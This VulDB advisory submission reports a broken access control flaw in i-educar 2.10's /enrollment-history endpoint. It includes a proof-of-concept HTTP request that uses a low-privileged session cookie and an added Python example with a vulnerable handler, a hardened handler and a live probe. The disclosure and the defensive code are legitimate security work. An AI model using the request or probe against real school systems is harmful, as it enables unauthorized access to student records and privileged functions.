Submit #649876: Portabilis i-educar 2.10 Broken Access Control

Title: Portabilis i-educar 2.10 Broken Access Control
Description:

# Broken Access Control in `/enrollment-history/[ID]` Endpoint

---

## Summary

A **Broken Access Control** vulnerability was identified in the `/enrollment-history/[ID]` endpoint of the _i-educar_ application. It allows authenticated users who lack the required permission to reach restricted functionality, bypassing the application's authorization checks.

---

## Details

**Vulnerable Endpoint:** `GET /enrollment-history/[ID]`

**Authentication:** Required

The application authenticates the caller but does not validate the caller's permissions before serving this endpoint. As a result, even low-privileged users can access functionality intended only for .

---

## PoC

1. Authenticate as a non-privileged user.

   ![Pasted image 20250905173645](https://github.com/user-attachments/assets/335886ad-844c-493f-8573-43e98ac14627)

   ![Pasted image 20250821191019](https://github.com/user-attachments/assets/e28f96f7-eece-4508-8ee1-f0fd1f4ac074)

2. Send the following request with the low-privileged user's session cookie:

   ```
   GET /enrollment-history/206 HTTP/1.1
   Host: localhost
   User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   Accept-Language: en-US,en;q=0.5
   Accept-Encoding: gzip, deflate, br, zstd
   Connection: keep-alive
   Referer: http://localhost/intranet/educar_matricula_det.php?cod_matricula=206
   Cookie: i_educar_session=[low_privileged cookie]
   Upgrade-Insecure-Requests: 1
   Sec-Fetch-Dest: document
   Sec-Fetch-Mode: navigate
   Sec-Fetch-Site: same-origin
   Sec-Fetch-User: ?1
   Priority: u=0, i
   ```

3. The page is served to this session, and it exposes the function to batch-unassign students from classes, an action this user should not be permitted to perform.

   ![Pasted image 20250905181121](https://github.com/user-attachments/assets/75f7cfad-f7a5-4894-8cfc-ff002be8b5e4)

---

## Impact

Broken Access Control vulnerabilities can have severe consequences, including:

- Unauthorized access to restricted functionality
- Escalation of privileges for low-level users
- Exposure of sensitive data and potential system compromise
- Loss of confidentiality and integrity of educational records
- Reputational damage to the organization
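The following is an added example, not code from i-educar or from the advisory author. It models the authorization gap the PoC describes (the endpoint checks that the caller is logged in, but not that the caller is allowed to use the function) beside a hardened handler that authorizes the specific function before loading any data, and it includes a differential probe that tells the two behaviours apart by sending the same request with a privileged and a low-privileged session. All role names, permission strings, session values and enrollment data below are constructed for illustration and are not i-educar's real ones; the only detail taken from the advisory is the `i_educar_session` cookie name and the `/enrollment-history/{id}` path used by `live_fetch`.

```python
"""Added example (not i-educar code): function-level authorization gap
behind GET /enrollment-history/{id}, its hardened form, and a probe.

Hypothetical names throughout; see the lead-in.
"""
import http.client
from dataclasses import dataclass, field

# Constructed session store (cookie value -> user). Hypothetical.
SESSIONS = {
    "admin-session": {"user": "admin",
                      "permissions": {"enrollment.view", "enrollment.batch_unassign"}},
    "lowpriv-session": {"user": "teacher",
                        "permissions": {"enrollment.view"}},
}

# Constructed enrollment data keyed by cod_matricula. Hypothetical.
ENROLLMENTS = {206: {"student": "student-206",
                     "history": ["2024: class 3A", "2025: class 4B"]}}


@dataclass
class Response:
    status: int
    body: dict = field(default_factory=dict)


def enrollment_history_vulnerable(enrollment_id: int, cookie: str) -> Response:
    """Reported behaviour: authentication only, no authorization check."""
    user = SESSIONS.get(cookie)
    if user is None:
        return Response(302, {"redirect": "/login"})  # anonymous: bounce to login
    rec = ENROLLMENTS.get(enrollment_id)
    if rec is None:
        return Response(404)
    # Page and its privileged action are returned to *any* logged-in user.
    return Response(200, {"history": rec["history"], "actions": ["batch_unassign"]})


def enrollment_history_hardened(enrollment_id: int, cookie: str) -> Response:
    """Deny by default: authorize the function first, then load data."""
    user = SESSIONS.get(cookie)
    if user is None:
        return Response(302, {"redirect": "/login"})
    if "enrollment.batch_unassign" not in user["permissions"]:
        return Response(403)  # authenticated but not permitted for this function
    rec = ENROLLMENTS.get(enrollment_id)
    if rec is None:
        return Response(404)
    return Response(200, {"history": rec["history"], "actions": ["batch_unassign"]})


def probe_access_control(fetch, privileged_cookie: str, low_cookie: str) -> str:
    """Differential check: same request, two sessions.

    fetch(cookie) -> HTTP status code. Returns 'vulnerable' when the
    low-privileged session gets the page a privileged session gets,
    'enforced' when it is denied (401/403) or redirected away (3xx),
    and 'inconclusive' when the privileged baseline itself fails.
    """
    if fetch(privileged_cookie) != 200:
        return "inconclusive"
    low = fetch(low_cookie)
    if low == 200:
        return "vulnerable"
    if low in (401, 403) or 300 <= low < 400:
        return "enforced"
    return "inconclusive"


def live_fetch(host: str, enrollment_id: int):
    """Build a fetch() against a real instance (lab use only; not run here).
    Cookie name follows the advisory's request (i_educar_session)."""
    def fetch(cookie: str) -> int:
        conn = http.client.HTTPConnection(host, timeout=10)
        try:
            conn.request("GET", f"/enrollment-history/{enrollment_id}",
                         headers={"Cookie": f"i_educar_session={cookie}"})
            return conn.getresponse().status
        finally:
            conn.close()
    return fetch


def check_in_process(handler, enrollment_id: int = 206) -> str:
    """Run the probe against one of the in-process handlers above."""
    return probe_access_control(lambda c: handler(enrollment_id, c).status,
                                "admin-session", "lowpriv-session")


if __name__ == "__main__":
    print("vulnerable handler:", check_in_process(enrollment_history_vulnerable))
    print("hardened handler:  ", check_in_process(enrollment_history_hardened))
    # Against a lab instance you would pass real session values, e.g.:
    # print(probe_access_control(live_fetch("localhost", 206), ADMIN, LOWPRIV))
```

The probe deliberately treats a redirect to the login page the same as a 403, because a framework that guards a route often answers unauthorized requests with a 302 rather than a 4xx; a 200 for the low-privileged session against a 200 baseline is the only outcome reported as vulnerable, and a failing baseline is reported as inconclusive rather than as a pass.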
Source: https://github.com/marcelomulder/CVE/blob/main/i-educar/Broken%20Access%20Control%20Vulnerability%20%20in%20%60.enrollment-history.(ID)%60%20Endpoint.md
User: marceloQz (UID 87549)
Submission: 07.09.2025 16:43 (9 months ago)
Moderation: 17.09.2025 09:04 (10 days later)
Status: Accepted
VulDB Entry: 324628 [Portabilis i-Educar up to 2.10 /enrollment-history/ privilege escalation]
Points: 20
